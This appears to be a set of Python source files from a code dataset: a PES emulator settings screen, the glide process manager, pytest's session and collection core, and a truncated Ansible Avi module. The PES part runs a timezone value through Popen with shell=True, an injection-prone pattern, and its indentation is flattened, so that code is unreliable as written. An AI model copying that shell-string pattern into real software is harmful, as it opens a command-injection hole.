self.__descriptionLabel.setText("Please make sure all axis are in their reset positions and then press START on the control pad you wish to configure.\n\nYou can abort the configuration process at any point by pressing BACKSPACE or the BACK button on your TV remote.\n\nIf your joystick/control pad does not have a particular button, press START to skip it.", True)
if not self.__jsPromptLabel:
self.__jsPromptLabel = self.addUiObject(Label(self.renderer, self.__descriptionLabel.x, self.__descriptionLabel.y + self.__descriptionLabel.height + 30, self.__jsPrompts[self.__jsPrompt].getPrompt(), self.app.bodyFont, self.app.textColour, fixedWidth=self.screenRect[2] - self.screenMargin))
self.__jsTimerLabel = self.addUiObject(Label(self.renderer, self.__jsPromptLabel.x, self.__jsPromptLabel.y + self.__jsPromptLabel.height + 10, "Timeout in: %ds" % self.__jsTimeRemaining, self.app.bodyFont, self.app.textColour, fixedWidth=self.screenRect[2] - self.screenMargin))
else:
self.__jsPromptLabel.setCoords(self.__descriptionLabel.x, self.__descriptionLabel.y + self.__descriptionLabel.height + 30)
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
self.__jsPromptLabel.setVisible(True)
self.__jsTimerLabel.setText("Timeout in: %ds" % self.__jsTimeRemaining)
self.__jsTimerLabel.setCoords(self.__jsPromptLabel.x, self.__jsPromptLabel.y + self.__jsPromptLabel.height + 10)
self.__jsTimerLabel.setVisible(True)
if not self.__gamepadLayoutIcon:
try:
img = Image.open(gamepadLayoutImageFile)
imgWidth, imgHeight = img.size
except IOError as e:
logging.error(e)
self.app.exit(1)
self.__gamepadLayoutIcon = self.addUiObject(Icon(self.renderer, self.screenRect[0] + ((self.screenRect[2] - imgWidth) / 2), self.__jsTimerLabel.y + self.__jsTimerLabel.height, imgWidth, imgHeight, gamepadLayoutImageFile, False))
self.__gamepadLayoutIcon.setVisible(True)
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
#logging.debug("PESApp.run: found %d control pads" % joystickTotal)
for i in xrange(joystickTotal):
js = sdl2.SDL_JoystickOpen(i)
self.__joysticks.append(js)
self.__init = False
else:
if selected == "Update Games" and self.__consoleList:
if event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_RIGHT:
self.__consoleList.setFocus(False)
self.__scanButton.setFocus(True)
elif event.key.keysym.sym == sdl2.SDLK_LEFT:
self.__consoleList.setFocus(True)
self.__scanButton.setFocus(False)
self.__selectAllButton.setFocus(False)
self.__deselectAllButton.setFocus(False)
else:
self.__consoleList.processEvent(event)
self.__scanButton.processEvent(event)
self.__selectAllButton.processEvent(event)
self.__deselectAllButton.processEvent(event)
if not self.__consoleList.hasFocus():
if event.key.keysym.sym == sdl2.SDLK_DOWN:
if self.__scanButton.hasFocus():
self.__scanButton.setFocus(False)
self.__selectAllButton.setFocus(True)
elif self.__selectAllButton.hasFocus():
self.__selectAllButton.setFocus(False)
self.__deselectAllButton.setFocus(True)
elif self.__deselectAllButton.hasFocus():
self.__deselectAllButton.setFocus(False)
self.__scanButton.setFocus(True)
elif event.key.keysym.sym == sdl2.SDLK_UP:
if self.__scanButton.hasFocus():
self.__scanButton.setFocus(False)
self.__deselectAllButton.setFocus(True)
elif self.__selectAllButton.hasFocus():
self.__selectAllButton.setFocus(False)
self.__scanButton.setFocus(True)
elif self.__deselectAllButton.hasFocus():
self.__deselectAllButton.setFocus(False)
self.__selectAllButton.setFocus(True)
elif selected == "Timezone" and self.__timezoneList:
self.__timezoneList.processEvent(event)
elif selected == "Audio" and self.__audioList:
if event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_RIGHT:
self.__audioList.setFocus(False)
self.__audioSaveButton.setFocus(True)
elif event.key.keysym.sym == sdl2.SDLK_LEFT:
self.__audioSaveButton.setFocus(False)
self.__audioList.setFocus(True)
else:
self.__audioList.processEvent(event)
self.__audioSaveButton.processEvent(event)
elif selected == "Gameplay" and self.__gameplayList:
if event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_RIGHT:
self.__gameplayList.setFocus(False)
self.__gameplaySaveButton.setFocus(True)
elif event.key.keysym.sym == sdl2.SDLK_LEFT:
self.__gameplayList.setFocus(True)
self.__gameplaySaveButton.setFocus(False)
else:
self.__gameplayList.processEvent(event)
self.__gameplaySaveButton.processEvent(event)
elif selected == "Joystick Set-Up":
if self.__ignoreJsEvents:
# don't accept an axis movement as the first input, only accept a button or hat
if event.type == sdl2.SDL_JOYBUTTONUP or event.type == sdl2.SDL_JOYHATMOTION or (event.type == sdl2.SDL_KEYUP and (event.key.keysym.sym == sdl2.SDLK_RETURN or event.key.keysym.sym == sdl2.SDLK_KP_ENTER)):
self.__ignoreJsEvents = False
elif event.type == sdl2.SDL_JOYBUTTONUP and self.__jsPrompt == 0:
self.__jsIndex = event.jbutton.which
self.__jsName = sdl2.SDL_JoystickName(self.__joysticks[self.__jsIndex])
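                    # record each axis's rest position so that later motion can be
                    # judged relative to it (analogue sticks rarely rest at exactly 0)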
for i in xrange(sdl2.SDL_JoystickNumAxes(self.__joysticks[self.__jsIndex])):
value = sdl2.SDL_JoystickGetAxis(self.__joysticks[self.__jsIndex], i)
logging.debug("SettingsScreen.processEvent: inital value for axis %d is: %d" % (i, value))
if value > JOYSTICK_AXIS_MAX or value < JOYSTICK_AXIS_MIN:
self.__jsInitialAxis.append(value)
else:
self.__jsInitialAxis.append(0)
self.__descriptionLabel.setText("Configuring joystick #%d, %s\n\nIf you joystick/control pad does not have the button/axis below, please press START to skip it." % (self.__jsIndex, self.__jsName))
logging.debug("SettingsScreen.processEvent: configuring joystick at %d (%s)" % (self.__jsIndex, self.__jsName))
self.__jsPrompts[self.__jsPrompt].setValue(JoystickPromptMap.BUTTON, event.jbutton.button)
self.__jsPrompt += 1
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
self.__jsTimeRemaining = self.__jsTimeOut
if self.menuActive: # this will be true if parent method trapped a backspace event
if event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_BACKSPACE:
logging.debug("SettingsScreen.processEvent: trapping backspace event")
self.__reset(False)
def __reset(self, resetMenu=True):
self.__init = True
self.__headerLabel.setText(self.__defaultHeaderText)
self.__descriptionLabel.setText(self.__initText, True)
self.__ignoreJsEvents = True
if resetMenu:
self.menu.setSelected(0)
self.app.doJsToKeyEvents = True
def __setTimezone(self, timezone):
process = Popen("%s %s" % (self.app.config.setTimezoneCommand, timezone), stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = process.communicate()
if process.returncode != 0:
logging.error("SettingsScreen.__setTimezone: failed to set timezone: %s" % stderr)
self.app.showMessageBox("Failed to set timezone!", None, None)
return
self.app.currentTimezone = timezone
self.__descriptionLabel.setText("You can change the current timezone from \"%s\" by selecting one from the list below." % self.app.currentTimezone, True)
self.app.showMessageBox("Timezone changed successfully", None, None)
def saveSettings(self):
logging.debug("SettingsScreen.saveSettings: saving settings...")
try:
self.app.config.retroAchievementsHardcore = self.__hardcoreModeMenuItem.isToggled()
self.app.config.set("RetroAchievements", "hardcore", self.__hardcoreModeMenuItem.isToggled())
audioDevicesToggled = self.__audioList.getMenu().getToggled()
if len(audioDevicesToggled) > 0:
device = audioDevicesToggled[0].getText()
logging.debug("SettingsScreen.saveSettings: audio device set to \"%s\"" % device)
self.app.config.audioDevice = device
self.app.config.set("Audio", "device", device)
# save ALSA settings
deviceRe = re.compile("^([\w]+):CARD=([\w]+)")
match = deviceRe.match(device)
if match:
device = "pcm.!default = plug:%s:%s" % (match.group(1), match.group(2))
else:
device = "pcm.!default = plug:%s" % device
with open(userAlsaConfFile, "w") as f:
f.write("# AUTOMATICALLY GENERATED BY PES\n")
f.write("%s\n" % device)
self.app.config.save()
self.app.goBack()
except Exception as e:
self.app.showMessageBox("Unable to save your settings (see console)", None, None)
logging.error(e)
def startScan(self):
logging.debug("SettingsScreen.startScan: beginning scan...")
self.__isBusy = True
if self.__scanProgressBar == None:
self.__scanProgressBar = ProgressBar(self.renderer, self.screenRect[0] + self.screenMargin, self.__descriptionLabel.y + self.__descriptionLabel.height + 10, self.screenRect[2] - (self.screenMargin * 2), 40, self.app.lineColour, self.app.menuBackgroundColour)
else:
self.__scanProgressBar.setProgress(0)
self.__updateDbThread = UpdateDbThread([c.getConsole() for c in self.__updateDatabaseMenu.getToggled()])
self.__updateDbThread.start()
def stop(self):
logging.debug("SettingsScreen.stop: deleting UI objects...")
super(SettingsScreen, self).stop()
if self.__updateDbThread:
self.__updateDbThread.stop()
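# Editor's sketch (not part of PES): __setTimezone above interpolates the
# timezone into a shell command string, which is fragile for unusual input.
# An argument-list Popen call sidesteps shell quoting entirely; this assumes
# setTimezoneCommand is a single executable path:
#
#   process = Popen([self.app.config.setTimezoneCommand, timezone],
#                   stdout=PIPE, stderr=PIPE)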
|
neilmunday/pes
|
lib/pes/app.py
|
Python
|
gpl-3.0
| 133,635
|
[
"VisIt"
] |
0fcf13df50efea56e4dc3634d83f55e3588ae04c59bc60f4ffe9a374ff942d16
|
import os
import multiprocessing
import asyncore
import datetime
class Status(object):
"""process status enum"""
REDY, RUNN, RSTT, STNG, KLNG, STPD, EXTD = \
'READY', 'RUNNING', 'RESTARTING', \
'STOPPING', 'KILLING', 'STOPPED', 'EXITED'
class Process(asyncore.file_dispatcher):
"""main process object"""
class Message(object):
"""container class of the emitted messages from the target process"""
def __init__(self, process, message):
self.process = process
self.message = message
def __str__(self):
return '%s: %s' % (self.process.name, self.message)
def __init__(self,
name,
path,
max_nl,
bm,
try_restart=-1,
kill_duration_time=20,
):
self.status = Status.REDY # initial status READY
self.name = name
self.path = path
self.max_nl = max_nl # max name length
self.bm = bm # blast module
self.try_restart = try_restart
self.kill_duration_time = kill_duration_time
self.bi = 0 # blast index
self.restarted = 0
self.rpi = 0
self.wpi = 0
self.start_time = None
def start(self):
if self.status not in (Status.REDY, Status.STPD, Status.EXTD):
return False, 'already operating'
self.rpi, self.wpi = os.pipe()
self.process = multiprocessing.Process(
target=self.__execute,
args=(self.path, self.rpi, self.wpi)
)
self.process.start()
self.pid = self.process.pid
# register the pipe's reader descriptor to asyncore
asyncore.file_dispatcher.__init__(self, self.rpi)
self.status = Status.RUNN
self.start_time = datetime.datetime.now()
self.elapsed_rule_time = None
return True, ''
def __execute(self, path, rpi, wpi):
pid = os.getpid()
# set the child process as a process group master itself
os.setpgid(pid, pid)
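        # route the child's stdout (fd 1) and stderr (fd 2) into the
        # pipe's write end, then drop the inherited descriptors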
os.dup2(wpi, 1)
os.dup2(wpi, 2)
os.close(wpi)
os.close(rpi)
os.execv(path[0], path)
def handle_read(self):
data = []
try:
while True: # read data from the pipe's reader
d = self.recv(1)
if d == '\n':
break
data.append(d)
# blast to the registered blast module
self.bm(Process.Message(self, ''.join(data)), self.bi)
self.bi += 1
except OSError: # tried to read after the descriptor closed
pass
def writable(self):
"""trick: add timeout callback implementation"""
if self.elapsed_rule_time:
self.elapsed_time = datetime.datetime.now() - self.elapsed_rule_time
if self.elapsed_time > \
datetime.timedelta(seconds=self.kill_duration_time):
os.kill(self.pid, 9)
return False
def terminate(self):
try:
self.elapsed_rule_time = datetime.datetime.now()
self.process.terminate()
except OSError: # no such process id
pass
def stop(self):
if self.status != Status.RUNN:
return False, 'not running'
self.status = Status.STNG
self.terminate()
return True, ''
def restart(self):
if self.status != Status.RUNN:
return False, 'not running'
self.status = Status.RSTT
self.terminate()
return True, ''
def hangup(self):
if self.status != Status.RUNN:
return False, 'not running'
        os.kill(self.pid, 1)  # SIGHUP; self.pid is set in start()
return True, ''
def alarm(self):
if self.status != Status.RUNN:
return False, 'not running'
        os.kill(self.pid, 14)  # SIGALRM
return True, ''
def cleanup(self):
for descriptor in [self.rpi, self.wpi]:
try:
os.close(descriptor)
except:
pass
asyncore.file_dispatcher.close(self)
if ((self.try_restart == -1 or self.try_restart > self.restarted) and
self.status == Status.EXTD) or self.status == Status.RSTT:
self.restarted += 1
self.status = Status.REDY
self.start()
return self
else:
self.status = Status.STPD
return None
def handle_error(self):
nil, t, v, tbinfo = asyncore.compact_traceback()
print '---', nil, t, v, tbinfo
def __str__(self):
if self.status not in (Status.STPD, Status.REDY, Status.EXTD):
tmpl = '%-' + str(self.max_nl) + \
's %10s pid %5s, uptime %s sec'
return tmpl % (self.name,
self.status,
self.pid,
datetime.datetime.now() - self.start_time)
else:
tmpl = '%-' + str(self.max_nl) + 's %10s'
return tmpl % (self.name,
self.status,)
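# Editor's usage sketch (not part of glide): start() registers the pipe
# reader with asyncore, so a plain asyncore.loop() call drives
# handle_read(). The 'blast' callback below is hypothetical.
if __name__ == '__main__':
    def blast(message, index):
        print message  # Message.__str__ renders as 'name: line'

    proc = Process('echo', ['/bin/echo', 'hello'], max_nl=8, bm=blast,
                   try_restart=0)
    proc.start()
    asyncore.loop(timeout=1, count=5)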
|
eseom/glide
|
glide/process.py
|
Python
|
mit
| 5,210
|
[
"BLAST"
] |
5fb6b39466fb867692b4b8dc4c61371e9ec0bad9ba8bad7d59e216aae53b5fd9
|
""" core implementation of testing process: init, session, runtest loop. """
import py
import pytest, _pytest
import os, sys, imp
tracebackcutdir = py.path.local(_pytest.__file__).dirpath()
# exitcodes for the command line
EXIT_OK = 0
EXIT_TESTSFAILED = 1
EXIT_INTERRUPTED = 2
EXIT_INTERNALERROR = 3
EXIT_USAGEERROR = 4
name_re = py.std.re.compile(r"^[a-zA-Z_]\w*$")
def pytest_addoption(parser):
parser.addini("norecursedirs", "directory patterns to avoid for recursion",
type="args", default=('.*', 'CVS', '_darcs', '{arch}'))
#parser.addini("dirpatterns",
# "patterns specifying possible locations of test files",
# type="linelist", default=["**/test_*.txt",
# "**/test_*.py", "**/*_test.py"]
#)
group = parser.getgroup("general", "running and selection options")
group._addoption('-x', '--exitfirst', action="store_true", default=False,
dest="exitfirst",
help="exit instantly on first error or failed test."),
group._addoption('--maxfail', metavar="num",
action="store", type="int", dest="maxfail", default=0,
help="exit after first num failures or errors.")
group._addoption('--strict', action="store_true",
help="run pytest in strict mode, warnings become errors.")
group = parser.getgroup("collect", "collection")
group.addoption('--collectonly',
action="store_true", dest="collectonly",
help="only collect tests, don't execute them."),
group.addoption('--pyargs', action="store_true",
help="try to interpret all arguments as python packages.")
group.addoption("--ignore", action="append", metavar="path",
help="ignore path during collection (multi-allowed).")
group.addoption('--confcutdir', dest="confcutdir", default=None,
metavar="dir",
help="only load conftest.py's relative to specified dir.")
group = parser.getgroup("debugconfig",
"test session debugging and configuration")
group.addoption('--basetemp', dest="basetemp", default=None, metavar="dir",
help="base temporary directory for this test run.")
def pytest_namespace():
collect = dict(Item=Item, Collector=Collector, File=File, Session=Session)
return dict(collect=collect)
def pytest_configure(config):
    py.test.config = config  # compatibility
if config.option.exitfirst:
config.option.maxfail = 1
def wrap_session(config, doit):
"""Skeleton command line program"""
session = Session(config)
session.exitstatus = EXIT_OK
initstate = 0
try:
try:
config.pluginmanager.do_configure(config)
initstate = 1
config.hook.pytest_sessionstart(session=session)
initstate = 2
doit(config, session)
except pytest.UsageError:
msg = sys.exc_info()[1].args[0]
sys.stderr.write("ERROR: %s\n" %(msg,))
session.exitstatus = EXIT_USAGEERROR
except KeyboardInterrupt:
excinfo = py.code.ExceptionInfo()
config.hook.pytest_keyboard_interrupt(excinfo=excinfo)
session.exitstatus = EXIT_INTERRUPTED
except:
excinfo = py.code.ExceptionInfo()
config.pluginmanager.notify_exception(excinfo, config.option)
session.exitstatus = EXIT_INTERNALERROR
if excinfo.errisinstance(SystemExit):
sys.stderr.write("mainloop: caught Spurious SystemExit!\n")
finally:
if initstate >= 2:
config.hook.pytest_sessionfinish(session=session,
exitstatus=session.exitstatus or (session._testsfailed and 1))
if not session.exitstatus and session._testsfailed:
session.exitstatus = EXIT_TESTSFAILED
if initstate >= 1:
config.pluginmanager.do_unconfigure(config)
return session.exitstatus
def pytest_cmdline_main(config):
return wrap_session(config, _main)
def _main(config, session):
""" default command line protocol for initialization, session,
running tests and reporting. """
config.hook.pytest_collection(session=session)
config.hook.pytest_runtestloop(session=session)
def pytest_collection(session):
return session.perform_collect()
def pytest_runtestloop(session):
if session.config.option.collectonly:
return True
for i, item in enumerate(session.items):
try:
nextitem = session.items[i+1]
except IndexError:
nextitem = None
item.config.hook.pytest_runtest_protocol(item=item, nextitem=nextitem)
if session.shouldstop:
raise session.Interrupted(session.shouldstop)
return True
def pytest_ignore_collect(path, config):
p = path.dirpath()
ignore_paths = config._getconftest_pathlist("collect_ignore", path=p)
ignore_paths = ignore_paths or []
excludeopt = config.getvalue("ignore")
if excludeopt:
ignore_paths.extend([py.path.local(x) for x in excludeopt])
return path in ignore_paths
class HookProxy:
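    """Proxy that forwards hook calls only to the plugins matching fspath."""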
def __init__(self, fspath, config):
self.fspath = fspath
self.config = config
def __getattr__(self, name):
hookmethod = getattr(self.config.hook, name)
def call_matching_hooks(**kwargs):
plugins = self.config._getmatchingplugins(self.fspath)
return hookmethod.pcall(plugins, **kwargs)
return call_matching_hooks
def compatproperty(name):
def fget(self):
return getattr(pytest, name)
return property(fget, None, None,
"deprecated attribute %r, use pytest.%s" % (name,name))
class Node(object):
""" base class for all Nodes in the collection tree.
Collector subclasses have children, Items are terminal nodes."""
def __init__(self, name, parent=None, config=None, session=None):
#: a unique name with the scope of the parent
self.name = name
#: the parent collector node.
self.parent = parent
#: the test config object
self.config = config or parent.config
#: the collection this node is part of
self.session = session or parent.session
#: filesystem path where this node was collected from
self.fspath = getattr(parent, 'fspath', None)
self.ihook = self.session.gethookproxy(self.fspath)
self.keywords = {self.name: True}
Module = compatproperty("Module")
Class = compatproperty("Class")
Instance = compatproperty("Instance")
Function = compatproperty("Function")
File = compatproperty("File")
Item = compatproperty("Item")
def _getcustomclass(self, name):
cls = getattr(self, name)
if cls != getattr(pytest, name):
py.log._apiwarn("2.0", "use of node.%s is deprecated, "
"use pytest_pycollect_makeitem(...) to create custom "
"collection nodes" % name)
return cls
def __repr__(self):
return "<%s %r>" %(self.__class__.__name__, getattr(self, 'name', None))
# methods for ordering nodes
@property
def nodeid(self):
try:
return self._nodeid
except AttributeError:
self._nodeid = x = self._makeid()
return x
def _makeid(self):
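        # e.g. "testing/test_foo.py::TestClass::()::test_method"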
return self.parent.nodeid + "::" + self.name
def __eq__(self, other):
if not isinstance(other, Node):
return False
return self.__class__ == other.__class__ and \
self.name == other.name and self.parent == other.parent
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash((self.name, self.parent))
def setup(self):
pass
def teardown(self):
pass
def _memoizedcall(self, attrname, function):
exattrname = "_ex_" + attrname
failure = getattr(self, exattrname, None)
if failure is not None:
py.builtin._reraise(failure[0], failure[1], failure[2])
if hasattr(self, attrname):
return getattr(self, attrname)
try:
res = function()
except py.builtin._sysex:
raise
except:
failure = py.std.sys.exc_info()
setattr(self, exattrname, failure)
raise
setattr(self, attrname, res)
return res
def listchain(self):
""" return list of all parent collectors up to self,
starting from root of collection tree. """
chain = []
item = self
while item is not None:
chain.append(item)
item = item.parent
chain.reverse()
return chain
def listnames(self):
return [x.name for x in self.listchain()]
def getplugins(self):
return self.config._getmatchingplugins(self.fspath)
def getparent(self, cls):
current = self
while current and not isinstance(current, cls):
current = current.parent
return current
def _prunetraceback(self, excinfo):
pass
def _repr_failure_py(self, excinfo, style=None):
if self.config.option.fulltrace:
style="long"
else:
self._prunetraceback(excinfo)
# XXX should excinfo.getrepr record all data and toterminal()
# process it?
if style is None:
if self.config.option.tbstyle == "short":
style = "short"
else:
style = "long"
return excinfo.getrepr(funcargs=True,
showlocals=self.config.option.showlocals,
style=style)
repr_failure = _repr_failure_py
class Collector(Node):
""" Collector instances create children through collect()
and thus iteratively build a tree.
"""
class CollectError(Exception):
""" an error during collection, contains a custom message. """
def collect(self):
""" returns a list of children (items and collectors)
for this collection node.
"""
raise NotImplementedError("abstract")
def repr_failure(self, excinfo):
""" represent a collection failure. """
if excinfo.errisinstance(self.CollectError):
exc = excinfo.value
return str(exc.args[0])
return self._repr_failure_py(excinfo, style="short")
def _memocollect(self):
""" internal helper method to cache results of calling collect(). """
return self._memoizedcall('_collected', lambda: list(self.collect()))
def _prunetraceback(self, excinfo):
if hasattr(self, 'fspath'):
path = self.fspath
traceback = excinfo.traceback
ntraceback = traceback.cut(path=self.fspath)
if ntraceback == traceback:
ntraceback = ntraceback.cut(excludepath=tracebackcutdir)
excinfo.traceback = ntraceback.filter()
class FSCollector(Collector):
def __init__(self, fspath, parent=None, config=None, session=None):
fspath = py.path.local(fspath) # xxx only for test_resultlog.py?
name = fspath.basename
if parent is not None:
rel = fspath.relto(parent.fspath)
if rel:
name = rel
name = name.replace(os.sep, "/")
super(FSCollector, self).__init__(name, parent, config, session)
self.fspath = fspath
def _makeid(self):
if self == self.session:
return "."
relpath = self.session.fspath.bestrelpath(self.fspath)
if os.sep != "/":
relpath = relpath.replace(os.sep, "/")
return relpath
class File(FSCollector):
""" base class for collecting tests from a file. """
class Item(Node):
""" a basic test invocation item. Note that for a single function
there might be multiple test invocation items.
"""
nextitem = None
def reportinfo(self):
return self.fspath, None, ""
@property
def location(self):
try:
return self._location
except AttributeError:
location = self.reportinfo()
# bestrelpath is a quite slow function
cache = self.config.__dict__.setdefault("_bestrelpathcache", {})
try:
fspath = cache[location[0]]
except KeyError:
fspath = self.session.fspath.bestrelpath(location[0])
cache[location[0]] = fspath
location = (fspath, location[1], str(location[2]))
self._location = location
return location
class NoMatch(Exception):
""" raised if matching cannot locate a matching names. """
class Session(FSCollector):
class Interrupted(KeyboardInterrupt):
""" signals an interrupted test run. """
__module__ = 'builtins' # for py3
def __init__(self, config):
super(Session, self).__init__(py.path.local(), parent=None,
config=config, session=self)
assert self.config.pluginmanager.register(self, name="session", prepend=True)
self._testsfailed = 0
self.shouldstop = False
self.trace = config.trace.root.get("collection")
self._norecursepatterns = config.getini("norecursedirs")
def pytest_collectstart(self):
if self.shouldstop:
raise self.Interrupted(self.shouldstop)
def pytest_runtest_logreport(self, report):
if report.failed and 'xfail' not in getattr(report, 'keywords', []):
self._testsfailed += 1
maxfail = self.config.getvalue("maxfail")
if maxfail and self._testsfailed >= maxfail:
self.shouldstop = "stopping after %d failures" % (
self._testsfailed)
pytest_collectreport = pytest_runtest_logreport
def isinitpath(self, path):
return path in self._initialpaths
def gethookproxy(self, fspath):
return HookProxy(fspath, self.config)
def perform_collect(self, args=None, genitems=True):
hook = self.config.hook
try:
items = self._perform_collect(args, genitems)
hook.pytest_collection_modifyitems(session=self,
config=self.config, items=items)
finally:
hook.pytest_collection_finish(session=self)
return items
def _perform_collect(self, args, genitems):
if args is None:
args = self.config.args
self.trace("perform_collect", self, args)
self.trace.root.indent += 1
self._notfound = []
self._initialpaths = set()
self._initialparts = []
self.items = items = []
for arg in args:
parts = self._parsearg(arg)
self._initialparts.append(parts)
self._initialpaths.add(parts[0])
self.ihook.pytest_collectstart(collector=self)
rep = self.ihook.pytest_make_collect_report(collector=self)
self.ihook.pytest_collectreport(report=rep)
self.trace.root.indent -= 1
if self._notfound:
for arg, exc in self._notfound:
line = "(no name %r in any of %r)" % (arg, exc.args[0])
raise pytest.UsageError("not found: %s\n%s" %(arg, line))
if not genitems:
return rep.result
else:
if rep.passed:
for node in rep.result:
self.items.extend(self.genitems(node))
return items
def collect(self):
for parts in self._initialparts:
arg = "::".join(map(str, parts))
self.trace("processing argument", arg)
self.trace.root.indent += 1
try:
for x in self._collect(arg):
yield x
except NoMatch:
# we are inside a make_report hook so
# we cannot directly pass through the exception
self._notfound.append((arg, sys.exc_info()[1]))
self.trace.root.indent -= 1
break
self.trace.root.indent -= 1
def _collect(self, arg):
names = self._parsearg(arg)
path = names.pop(0)
if path.check(dir=1):
assert not names, "invalid arg %r" %(arg,)
for path in path.visit(fil=lambda x: x.check(file=1),
rec=self._recurse, bf=True, sort=True):
for x in self._collectfile(path):
yield x
else:
assert path.check(file=1)
for x in self.matchnodes(self._collectfile(path), names):
yield x
def _collectfile(self, path):
ihook = self.gethookproxy(path)
if not self.isinitpath(path):
if ihook.pytest_ignore_collect(path=path, config=self.config):
return ()
return ihook.pytest_collect_file(path=path, parent=self)
def _recurse(self, path):
ihook = self.gethookproxy(path.dirpath())
if ihook.pytest_ignore_collect(path=path, config=self.config):
return
for pat in self._norecursepatterns:
if path.check(fnmatch=pat):
return False
ihook = self.gethookproxy(path)
ihook.pytest_collect_directory(path=path, parent=self)
return True
def _tryconvertpyarg(self, x):
mod = None
path = [os.path.abspath('.')] + sys.path
for name in x.split('.'):
# ignore anything that's not a proper name here
# else something like --pyargs will mess up '.'
# since imp.find_module will actually sometimes work for it
# but it's supposed to be considered a filesystem path
# not a package
if name_re.match(name) is None:
return x
try:
fd, mod, type_ = imp.find_module(name, path)
except ImportError:
return x
else:
if fd is not None:
fd.close()
if type_[2] != imp.PKG_DIRECTORY:
path = [os.path.dirname(mod)]
else:
path = [mod]
return mod
def _parsearg(self, arg):
""" return (fspath, names) tuple after checking the file exists. """
arg = str(arg)
if self.config.option.pyargs:
arg = self._tryconvertpyarg(arg)
parts = str(arg).split("::")
relpath = parts[0].replace("/", os.sep)
path = self.fspath.join(relpath, abs=True)
if not path.check():
if self.config.option.pyargs:
msg = "file or package not found: "
else:
msg = "file not found: "
raise pytest.UsageError(msg + arg)
parts[0] = path
return parts
def matchnodes(self, matching, names):
self.trace("matchnodes", matching, names)
self.trace.root.indent += 1
nodes = self._matchnodes(matching, names)
num = len(nodes)
self.trace("matchnodes finished -> ", num, "nodes")
self.trace.root.indent -= 1
if num == 0:
raise NoMatch(matching, names[:1])
return nodes
def _matchnodes(self, matching, names):
if not matching or not names:
return matching
name = names[0]
assert name
nextnames = names[1:]
resultnodes = []
for node in matching:
if isinstance(node, pytest.Item):
if not names:
resultnodes.append(node)
continue
assert isinstance(node, pytest.Collector)
node.ihook.pytest_collectstart(collector=node)
rep = node.ihook.pytest_make_collect_report(collector=node)
if rep.passed:
has_matched = False
for x in rep.result:
if x.name == name:
resultnodes.extend(self.matchnodes([x], nextnames))
has_matched = True
# XXX accept IDs that don't have "()" for class instances
if not has_matched and len(rep.result) == 1 and x.name == "()":
nextnames.insert(0, name)
resultnodes.extend(self.matchnodes([x], nextnames))
node.ihook.pytest_collectreport(report=rep)
return resultnodes
def genitems(self, node):
self.trace("genitems", node)
if isinstance(node, pytest.Item):
node.ihook.pytest_itemcollected(item=node)
yield node
else:
assert isinstance(node, pytest.Collector)
node.ihook.pytest_collectstart(collector=node)
rep = node.ihook.pytest_make_collect_report(collector=node)
if rep.passed:
for subnode in rep.result:
for x in self.genitems(subnode):
yield x
node.ihook.pytest_collectreport(report=rep)
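# Editor's sketch (not part of pytest): _parsearg splits "::"-separated
# selectors into a filesystem path plus trailing names, e.g.
#
#   session._parsearg("tests/test_mod.py::TestX::test_one")
#   # -> [local('.../tests/test_mod.py'), 'TestX', 'test_one']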
|
npinto/pytest
|
_pytest/main.py
|
Python
|
mit
| 20,958
|
[
"VisIt"
] |
26d3491699307820aed2b98ff52474ffa1e45bc12053dea28339fa0df3dfefec
|
#!/usr/bin/python
#
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
# Avi Version: 17.1.1
#
# Copyright: (c) 2017 Gaurav Rastogi, <grastogi@avinetworks.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_networkprofile
author: Gaurav Rastogi (@grastogi23) <grastogi@avinetworks.com>
short_description: Module for setup of NetworkProfile Avi RESTful Object
description:
- This module is used to configure NetworkProfile object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
description:
description:
- User defined description for the object.
name:
description:
- The name of the network profile.
required: true
profile:
description:
- Networkprofileunion settings for networkprofile.
required: true
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Uuid of the network profile.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Create a network profile for a UDP application
avi_networkprofile:
controller: '{{ controller }}'
username: '{{ username }}'
password: '{{ password }}'
name: System-UDP-Fast-Path
profile:
type: PROTOCOL_TYPE_UDP_FAST_PATH
udp_fast_path_profile:
per_pkt_loadbalance: false
session_idle_timeout: 10
snat: true
tenant_ref: admin
"""
RETURN = '''
obj:
description: NetworkProfile (api/networkprofile) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
description=dict(type='str',),
name=dict(type='str', required=True),
profile=dict(type='dict', required=True),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
